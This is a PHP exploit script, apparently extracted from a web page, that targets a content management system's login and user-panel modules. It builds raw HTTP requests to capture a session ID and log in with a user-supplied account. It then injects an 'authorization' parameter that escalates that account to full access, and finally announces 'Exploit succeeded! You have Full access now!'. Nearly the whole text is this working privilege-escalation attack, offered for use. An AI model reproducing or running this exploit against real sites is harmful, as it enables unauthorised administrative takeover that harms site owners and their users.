Target URL (whit trailing slash) :

http://

Username :



Password :



*First Create an account on target!
The exploit will login with this username and password and then grants full access to this account!

No response from '.htmlentities($host).'
'); } if(isset($_POST['start'])) { if ($_POST['target'] == '' || $_POST['username'] == '' || $_POST['username'] == '') { die('Error : All fields are required!'); } $Target = trim($_POST['target']); $Username = trim($_POST['username']); $Password = trim($_POST['password']); $Target .= ($Target[strlen($Target)-1] <> '/') ? '/' : ''; $host = substr($Target, 0 ,strpos($Target, '/')); $path = substr($Target, strpos($Target, '/')); $Query1 = $path.'index.php'; $packet1 = "HEAD $Query1 HTTP/1.1\r\n"; $packet1 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet1 .= "Host: ".$host."\r\n"; $packet1 .= "Connection: Close\r\n\r\n"; sendpacket($packet1); echo nl2br(htmlentities($html)); $Pattern = "(PHPSESSID=[a-z0-9]{20,32})"; if(preg_match($Pattern, $html, $Matches)) { $Match = $Matches[0]; $PHPSESSID = substr($Match, 10, strlen($Match)); } $Query2 = $path.'index.php?n=modules/login'; $packet2 = "POST $Query2&username=$Username&password=$Password&submit=Login&PHPSESSID=$PHPSESSID HTTP/1.1\r\n"; $packet2 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet2 .= "Host: ".$host."\r\n"; $packet2 .= "Connection: Close\r\n\r\n"; sendpacket($packet2); if(stristr($html , 'i=1') == true) { die('Error : Incorrect username or password! Try again!'); } else if(stristr($html , 'i=5') == true) { die('Error : Someone is currently using that account!'); } else $RandMail = substr($PHPSESSID, 10, 6).'_mail@none.com'; $Query3 = $path.'index.php?n=modules/panel&a=2&tmp[authorization]=4'; $packet3 = "POST $Query3&editpassword=&editpassword2=&editemail=$RandMail&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID=$PHPSESSID HTTP/1.1\r\n"; $packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet3 .= "Host: ".$host."\r\n"; $packet3 .= "Connection: Close\r\n\r\n"; sendpacket($packet3); if(stristr($html , 'i=26') == false) { die('Exploit Failed'); } $Query4 = $path.'index.php?n=modules/login&a=1'; $packet4 = "POST $Query4&PHPSESSID=$PHPSESSID HTTP/1.1\r\n"; $packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n"; $packet4 .= "Host: ".$host."\r\n"; $packet4 .= "Connection: Close\r\n\r\n"; sendpacket($packet4); die('Exploit succeeded! You have Full access now!'); } ?>